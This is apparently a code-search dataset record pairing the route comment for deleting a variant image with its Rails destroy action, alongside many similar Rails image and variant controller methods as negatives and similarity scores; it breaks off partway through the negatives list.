"def update\n @album = Album.find(params[:id])\n \n respond_to do |format|\n if @album.update_attributes(params[:album])\n @album.images.clear\n @album.images << Image.find([params[:images]].flatten)\n @album.save!\n format.html { redirect_to(albums_path, :notice => 'Album was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @album.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n\n respond_to do |format|\n if @estate_agent_image.update_attributes(params[:property_image])\n format.html { redirect_to @estate_agent_image, notice: 'Property image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @estate_agent_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @item.update(item_params)\n @item.images.delete_all\n unless params.require(:item)[:images_id].nil?\n params.require(:item)[:images_id].each do |id|\n image = Image.find_by_id(id)\n (@item.images << image) unless image.nil?\n end\n end\n format.html { redirect_to @item, notice: 'Item was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def song_save_image\r\n\r\n\t\t@song = Song.find(params[:song_id])\r\n\t\t@artist = Artist.find_by_url_slug(params[:url_slug])\r\n\r\n\t\t@song.image = \"https://\"+IMAGE_BUCKET+\".s3.amazonaws.com/Three_Repeater-\"+@artist.url_slug+\"-\"+@song.id.to_s+\"-\"+params[:file_name]\r\n\r\n\t\t@song.update_column(:image,@song.image)\r\n\r\n\t\tlogger.info(\"song image= \"+@song.image.to_s)\r\n\r\n\t\trespond_to do |f|\r\n\r\n\t\t\tf.json {\r\n\t\t\t\trender :json => {\r\n\t\t\t\t\t\t:success => true}\r\n\t\t\t}\r\n\r\n\t\tend\r\n\r\n\tend",
"def index\n @variant_images = VariantImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variant_images }\n end\n end",
"def destroy\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n @variant_image.destroy\n\n respond_to do |format|\n format.html { redirect_to @variant.product }\n format.json { head :ok }\n end\n end",
"def update\n @food.build_image(params['image']) do |t|\n if params['food']['image']['data']\n t.data = Base64.encode64(params['food']['image']['data'].read)\n t.filename = params['food']['image']['data'].original_filename\n t.mime_type = params['food']['image']['data'].content_type\n end\n end \n @food.name = @food.name.capitalize\n respond_to do |format|\n if @food.update(food_params)\n format.html { redirect_to @food, notice: 'Food was successfully updated.' }\n format.json { render :show, status: :ok, location: @food }\n else\n format.html { render :edit }\n format.json { render json: @food.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @taxi_image.update(taxi_image_params)\n format.html { redirect_to @taxi_image, notice: 'Taxi image was successfully updated.' }\n format.json { render :show, status: :ok, location: @taxi_image }\n else\n format.html { render :edit }\n format.json { render json: @taxi_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @s3_image = S3Image.find(params[:id])\n\n respond_to do |format|\n if @s3_image.update_attributes(params[:s3_image])\n format.html { redirect_to @s3_image, notice: 'S3 image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @s3_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @vehicle_type.update(vehicle_type_params)\n images\n\n format.html { redirect_to @vehicle_type, notice: 'Vehicle type was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @vehicle_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def update\n respond_to do |format|\n if @variant.update(variant_params)\n format.html { redirect_to edit_admin_good_url(@variant.good, anchor: \"variants\"), notice: 'Variant was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n\n respond_to do |format|\n format.html # show.html.erb\n format.js\n format.json { render json: @variant_image }\n end\n end",
"def update\n respond_to do |format|\n if @image_to_sample.update(image_to_sample_params)\n format.html { redirect_to @image_to_sample, notice: 'Image to sample was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image_to_sample.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n parms = ski_params\n parms[:color] = parms[:color].split(', ') if parms[:color]\n respond_to do |format|\n if @ski.update(parms)\n if params[:images]\n @ski.gallery ||= Gallery.new\n params[:images].each do |image|\n @ski.gallery.images.create(image: image)\n end\n unless @ski.image_file_size\n @ski.update(image: @ski.gallery.images.first.image)\n end\n end\n format.html { redirect_to @ski, notice: 'Ski was successfully updated.' }\n format.json { render :show, status: :ok, location: @ski }\n else\n format.html { render :edit }\n format.json { render json: @ski.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @car.update(car_params)\n unless params[:photos].blank?\n params[:photos]['image'].each do |p|\n @photo = @car.photos.create!(:image => p, :car_id => @car.id)\n end\n end\n format.html { redirect_to @car, notice: 'Car was successfully updated.' }\n format.json { render :show, status: :ok, location: @car }\n else\n format.html { render :edit }\n format.json { render json: @car.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = @album.images.find(params[:id])\n @image.update(image_params)\n redirect_to album_path(@image.album.id)\n end",
"def update\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n if @variant.update_attributes(params[:variant])\n format.html { redirect_to admin_product_variants_path(@variant.master_id),\n notice: 'Variant was successfully updated.' }\n format.json { head :no_content }\n else\n @path = admin_product_variant_path(@variant.master_id, @variant)\n format.html { render action: \"edit\" }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @sub_collection.update(sub_collection_params)\n if not sub_collection_images_params[:sub_collection_images_attributes].nil?\n sub_collection_images_params[:sub_collection_images_attributes].each do |sci|\n @sub_collection.sub_collection_images.create(sub_collection_image: sci[:sub_collection_image])\n end\n end\n format.html { redirect_to @sub_collection, notice: 'Sub collection was successfully updated.' }\n format.json { render :show, status: :ok, location: @sub_collection }\n else\n @sub_collection.sub_collection_images.build\n format.html { render :edit }\n format.json { render json: @sub_collection.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @family_image = FamilyImage.find(params[:id])\n\n if @family_image.update(family_image_params)\n head :no_content\n else\n render json: @family_image.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @img.update(img_params)\n format.html { redirect_to @img, notice: \"Img was successfully updated.\" }\n format.json { render :show, status: :ok, location: @img }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @img.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to '/galleries/' + params[:galery_id].to_s, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @animal_image.update(animal_image_params)\n format.html { redirect_to @animal_image, notice: \"Animal image was successfully updated.\" }\n format.json { render :show, status: :ok, location: @animal_image }\n else\n format.html { render :edit }\n format.json { render json: @animal_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @event.update(event_params)\n if params[:images]\n params[:images].each { |image|\n @event.images.create(image: image)\n }\n end\n if params[:selected]\n params[:selected].each { |selecte|\n @event.images.destroy(selecte)\n }\n end \n format.html { redirect_to @event, notice: 'Evento actualizado correctamente.' }\n format.json { render :show, status: :ok, location: @event }\n else\n format.html { render :edit }\n format.json { render json: @event.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @s3image.update(s3image_params)\n format.html { redirect_to @s3image, notice: 'S3image was successfully updated.' }\n format.json { render :show, status: :ok, location: @s3image }\n else\n format.html { render :edit }\n format.json { render json: @s3image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if image.update(image_params)\n format.html { redirect_to image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: image }\n else\n format.html { render :edit }\n format.json { render json: image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @place.update(place_params)\n if params[:images]\n params[:images].each do |image|\n @place.photos.create(image: image)\n end\n end\n format.html do\n redirect_to @place, notice: 'Place was successfully updated.'\n end\n format.json { render :show, status: :ok, location: @place }\n else\n format.html { render :edit }\n format.json { render json: @place.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_image\n # wish image can be updated only when then wish belongs to current user\n if @wish.user_id == current_user.id\n @wish.image.purge\n @wish.image.attach(wish_params[:image])\n render json: url_for(@wish.image)\n end\n end",
"def update\n if params[:sequence][:image]\n create_image\n render json: @sequence, status: :ok and return\n end\n respond_to do |format|\n if @sequence.update(sequence_params)\n format.html { redirect_to @sequence, notice: 'Sequence was successfully updated.' }\n format.json { render :show, status: :ok, location: @sequence }\n else\n format.html { render :edit }\n format.json { render json: @sequence.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n \n if @animal.update(animal_params)\n if params[:images]\n params[:images].each { |image|\n @animal.images.create(image: image)\n }\n end\n if params[:selected]\n params[:selected].each { |selecte|\n @animal.images.destroy(selecte)\n }\n end\n if animal_params[:solved]\n format.html { redirect_to @animal}\n else\n format.html { redirect_to @animal, notice: 'Publicación actualizada correctamente.' }\n end\n format.json { render :show, status: :ok, location: @animal }\n else\n format.html { render :edit }\n format.json { render json: @animal.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, :notice => 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @image.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @recipe_image.update(recipe_image_params)\n format.html { redirect_to @recipe_image, notice: 'Recipe image was successfully updated.' }\n format.json { render :show, status: :ok, location: @recipe_image }\n else\n format.html { render :edit }\n format.json { render json: @recipe_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @cafe, notice: 'image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_image(row, h2i, product_id, row_index)\n url = get_val row, 'images', h2i\n return nil unless url\n res = sphere.post_image product_images_url(@sphere_project_key, product_id), url\n raise \"[row #{row_index}] Problems on image upload: '#{url}' - server returned with code '#{res.code}':\\n #{res.body}\" if res == nil or res.code != \"200\"\n j = parse_JSON res.body\n j['version'] # The method returns the latest version of the product.\n end",
"def update\n respond_to do |format|\n if @image_tag.update(image_tag_params)\n format.html { redirect_to @image_tag, notice: 'Image tag was successfully updated.' }\n format.json { render :show, status: :ok, location: @image_tag }\n else\n format.html { render :edit }\n format.json { render json: @image_tag.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @vmimage.update(vmimage_params)\n format.html { redirect_to @vmimage, notice: 'Vmimage was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @vmimage.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n b = Bubo.from_heroku\n b.remove_image(@image.id.to_s)\n b.add_image(@image.id.to_s, @image.url)\n \n format.html { redirect_to(@image, :notice => 'Image was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @image.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @variant.update(variant_params)\n format.html { redirect_to admin_product_variants_url(@product), notice: 'Variant was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @property_image = PropertyImage.find(params[:id])\n\n respond_to do |format|\n if @property_image.update_attributes(params[:property_image])\n format.html { redirect_to property_images_path, notice: 'Property image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @property_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @showcase = Showcase.find(params[:showcase_id])\n @showcase_image = ShowcaseImage.find(params[:id])\n\n if @showcase_image.update_attributes(params[:showcase_image])\n redirect_to edit_showcase_url(@showcase)\n else\n render :action => \"edit\"\n end\n end",
"def update\n @pictures = Picture.all.order(created_at: :desc)\n @picture.update(picture_params)\n render json: @pictures\n # head :no_content\n end",
"def update\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n if @slider_image.update_attributes(params[:slider_image])\n format.html { redirect_to slider_images_path, notice: 'Slider image was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @slider_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n if @variant.update_attributes(params[:variant])\n format.html { redirect_to event_path(@variant.event), notice: 'Ticket type was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @raw_image.update(raw_image_params)\n redirect_to admin_raw_images_path\n\n end",
"def update\n par = img_properties\n logger.info(\"parameters: #{par.inspect}\")\n valid = true\n\n # find by user associated to app key, not by user from request parameter!\n @image = Image.editable_by(@user).find_by_guid(params[:id])\n\n return not_found if !@image\n\n # set these variables back to nil if they were in the request but blank\n if par[:ref]\n @image.ref = par[:ref].blank? ? nil : par[:ref]\n end\n if par[:name]\n @image.name = par[:name].blank? ? nil : par[:name]\n end\n if par[:page_url]\n @image.page_url = par[:page_url].blank? ? nil : par[:page_url]\n end\n @image.private = par[:private] if par[:private]\n\n # update calibration data if specified\n if !par[:calibrate_length].blank?\n @image.calibrate_length = par[:calibrate_length].to_f\n @image.calibrate_unit = par[:calibrate_unit].to_i if !par[:calibrate_unit].blank?\n @image.calibrate_coords = par[:calibrate_coords] if !par[:calibrate_coords].blank?\n @image.ppi = calculate_ppi(@image)\n end\n\n orig_url = par[:original_url] || par[:url]\n begin\n # this may fail\n if !orig_url.blank? && orig_url != @image.original_url\n # url was updated\n @image.remote_upload_url = orig_url\n @image.original_url = orig_url\n end\n rescue CarrierWave::DownloadError\n @image.errors.add(:remote_upload_url, \"^This url doesn't appear to be valid\")\n valid = false\n rescue CarrierWave::IntegrityError\n @image.errors.add(:remote_upload_url, \"^This url does not appear to point to a valid image\")\n valid = false\n rescue StandardError\n @image.errors.add(:remote_upload_url, \"There does not appear to be an image at this url\")\n valid = false\n end\n\n if valid && @image.save\n # update product if set\n @image.user_product = par[:product] if par[:product]\n\n image_data = @image.js_serialize\n # if the user hit the 'save and next' button, include the guid of the next image in the response.\n # The client side will redirect to the edit page for that image. \n if params[:commit] == 'save and next'\n image = Image.find_most_recent_uncalibrated(current_user.id)\n image_data['nextImage'] = image.guid if image\n end\n render :json => image_data, :callback => params[:callback]\n else\n render :json => { :error => 403, :messages => prepare_errors(@image), :callback => params[:callback] }, :status => 200\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @sample_photo.update(sample_photo_params)\n render json: @sample_photo, status: :ok\n else\n render json: @sample_photo.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html {redirect_to @image, notice: 'Image was successfully updated.'}\n format.json {render :show, status: :ok, location: @image}\n else\n format.html {render :edit}\n format.json {render json: @image.errors, status: :unprocessable_entity}\n end\n end\n end",
"def set_viewable\n viewable_id = params[:image][:viewable_id]\n\n if viewable_id.is_a?(Hash)\n @product.errors.add(:attachment, 'Erro')\n option_values_array = viewable_id.map {|option_type, option_values| option_values.map(&:to_i) }\n option_values_combinations = option_values_array.shift\n option_values_array.each do |option_value|\n option_values_combinations = option_values_combinations.product(option_value)\n end\n option_values_combinations = option_values_combinations.map(&:flatten) if option_values_combinations.count > 1\n\n @product.variants.each do |variant|\n option_values_combinations.each do |ov_combination|\n variant_option_ids = variant.option_values.pluck(:id)\n\n if ([ov_combination].flatten - variant_option_ids).empty?\n create_image(variant, permitted_resource_params)\n end\n end\n end\n else\n viewable_id = params[:master_option] if params[:master_option]\n @image.viewable_type = 'Spree::Variant'\n @image.viewable_id = viewable_id\n end\n end",
"def put_storage(request, params)\n xmldoc = XMLElement.build_xml(request.body, 'STORAGE')\n image_info = XMLElement.new(xmldoc) if xmldoc != nil\n\n image = ImageOCCI.new(\n Image.build_xml(params[:id]),\n @client)\n\n rc = nil\n if image_info['PERSISTENT'] && image_info['PUBLIC']\n error_msg = \"It is not allowed more than one change per request\"\n return OpenNebula::Error.new(error_msg), 400\n elsif image_info['PERSISTENT'] == 'YES'\n rc = image.persistent\n elsif image_info['PERSISTENT'] == 'NO'\n rc = image.nonpersistent\n elsif image_info['PUBLIC'] == 'YES'\n rc = image.publish\n elsif image_info['PUBLIC'] == 'NO'\n rc = image.unpublish\n end\n\n if OpenNebula.is_error?(rc)\n return rc, CloudServer::HTTP_ERROR_CODE[rc.errno]\n end\n\n # --- Prepare XML Response ---\n image.info\n return to_occi_xml(image, :code=>202)\n end",
"def update\n respond_to do |format|\n if @gallery.update(gallery_params)\n if params[:images]\n params[:images].each { |image|\n pic = @gallery.pics.create(image: image)\n data = Cloudinary::Uploader.upload(image,@auth)\n pic.public_id = data['secure_url']\n pic.image_file_size = data['bytes']\n pic.save\n }\n end\n format.html { redirect_to @gallery, notice: 'Gallery was successfully updated.' }\n format.json { render :show, status: :ok, location: @gallery }\n else\n format.html { render :edit }\n format.json { render json: @gallery.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @electriccar.update(electriccar_params)\n if params[:images]\n @electriccar.gallery ||= Gallery.new\n params[:images].each do |image|\n @electriccar.gallery.images.create(image: image)\n end\n unless @electriccar.image_file_size\n @electriccar.update(image: @electriccar.gallery.images.first.image)\n end\n end\n format.html { redirect_to @electriccar, notice: 'Electriccar was successfully updated.' }\n format.json { render :show, status: :ok, location: @electriccar }\n else\n format.html { render :edit }\n format.json { render json: @electriccar.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n unless params[:image][:tags].nil?\n @image.tag_with params[:image]['tags']\n params[:image].delete(\"tags\")\n end\n respond_to do |format|\n if @image.update_attributes(params[:image])\n flash[:notice] = 'Image was successfully updated.'\n format.html { redirect_to([:admin, @image]) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @image.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def variant_params\n params.require(:variant).permit(:sku, :product_id, :position, :price, :variant_price, option_value_ids: [], assets_attributes: [:id, :image, :_destroy])\n end",
"def update\n if @experience.update(experience_params)\n\n if params[:images] \n params[:images].each do |image|\n @experience.photos.create(image: image)\n end\n end\n\n redirect_to edit_trip_experience_path(@trip,@experience), notice: \"Updated...\"\n else\n render :edit\n end\n end",
"def update\r\n respond_to do |format|\r\n if @image.update(image_params)\r\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\r\n format.json { render :show, status: :ok, location: @image }\r\n else\r\n format.html { render :edit }\r\n format.json { render json: @image.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def image hash = {}\n hash = { :id => hash} if hash.is_a? String\n home hash.update :action => 'image', :trailing_slash => false\n end",
"def set_animal_image\n @animal_image = AnimalImage.find(params[:id])\n end",
"def update\n if(@check)\n @evento.update(event_params.except(:token))\n if @evento.save\n #first we delete all the current images if there are\n if params[:event_image_data]\n @evento.event_images.each do |image|\n image.destroy\n end\n #then we will create new ones\n params[:event_image_data].each do |file|\n @evento.event_images.create!(:image => file)\n end\n end\n render json: @evento, status: :ok, location: @evento\n else\n render json: @evento.errors, status: :unprocessable_entity\n end\n end\n end",
"def update\n respond_to do |format|\n data = snarf_image_data\n if @beverage.update(beverage_params)\n if data\n STDERR.puts \"UPDATING DATA\"\n @beverage.image_data = Base64.encode64(data)\n @beverage.save\n end\n if mid = motor_id_param\n new_motor = Motor.find(mid)\n pp new_motor.id\n pp new_motor.uuid\n @beverage.motor = new_motor if new_motor\n @beverage.save\n end\n\n format.html { redirect_to @beverage, notice: \"Beverage was successfully updated.\" }\n format.json { render :show, status: :ok, location: @beverage }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @beverage.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.685779",
"0.6613139",
"0.65422946",
"0.65422946",
"0.64632577",
"0.6349292",
"0.62428784",
"0.62285197",
"0.6191053",
"0.61872923",
"0.6173035",
"0.6151853",
"0.6150835",
"0.6141934",
"0.61195475",
"0.61183",
"0.6104693",
"0.6087452",
"0.60852027",
"0.6080466",
"0.60675687",
"0.6066172",
"0.60491836",
"0.6022617",
"0.60159135",
"0.6006063",
"0.5999727",
"0.5990983",
"0.59825796",
"0.5961401",
"0.59580576",
"0.5957686",
"0.59568673",
"0.59408176",
"0.59352076",
"0.5935033",
"0.5932905",
"0.5931821",
"0.59245956",
"0.5923135",
"0.5906676",
"0.58827114",
"0.58771574",
"0.5872752",
"0.58700234",
"0.585377",
"0.5841477",
"0.5838754",
"0.5838754",
"0.5838754",
"0.5838754",
"0.58343416",
"0.5832484",
"0.58251715",
"0.58203804",
"0.58129454",
"0.58116454",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.5794688",
"0.5792371",
"0.5790557",
"0.5787037",
"0.57864785",
"0.57861483",
"0.57853246",
"0.57832724",
"0.578255",
"0.57716775",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.5762669",
"0.57502276",
"0.57443845",
"0.5744122",
"0.57425416",
"0.57365793",
"0.5734688",
"0.5728777",
"0.5726281",
"0.57161516",
"0.5714995",
"0.5713288",
"0.57071596",
"0.56995374",
"0.5694955"
] | 0.7366369 | 0 |
DELETE /variant_images/1 DELETE /variant_images/1.json | def destroy
@variant_image = VariantImage.find(params[:id])
@variant = @variant_image.variant
@variant_image.destroy
respond_to do |format|
format.html { redirect_to @variant.product }
format.json { head :ok }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def destroy\n #Finds selected image\n @image = Image.find(params[:id])\n #destroy image\n @image.destroy\n respond_to do |format|\n format.html { redirect_to '/admin' }\n format.json { head :ok }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n render json: {status: \"success\"}, status: :ok\n end",
"def destroy\n @image.destroy\n\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n @estate_agent_image.destroy\n\n respond_to do |format|\n format.html { redirect_to estate_agent_image_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to(images_url) }\n format.json { head :ok }\n end\n end",
"def delete\n item = FormImage.last\n id = item[:id]\n item.destroy\n render json: {id: id}\n end",
"def destroy\n @variant.destroy\n respond_to do |format|\n format.html { redirect_to edit_admin_good_url(@variant.good, anchor: \"variants\") }\n format.json { head :no_content }\n end\n end",
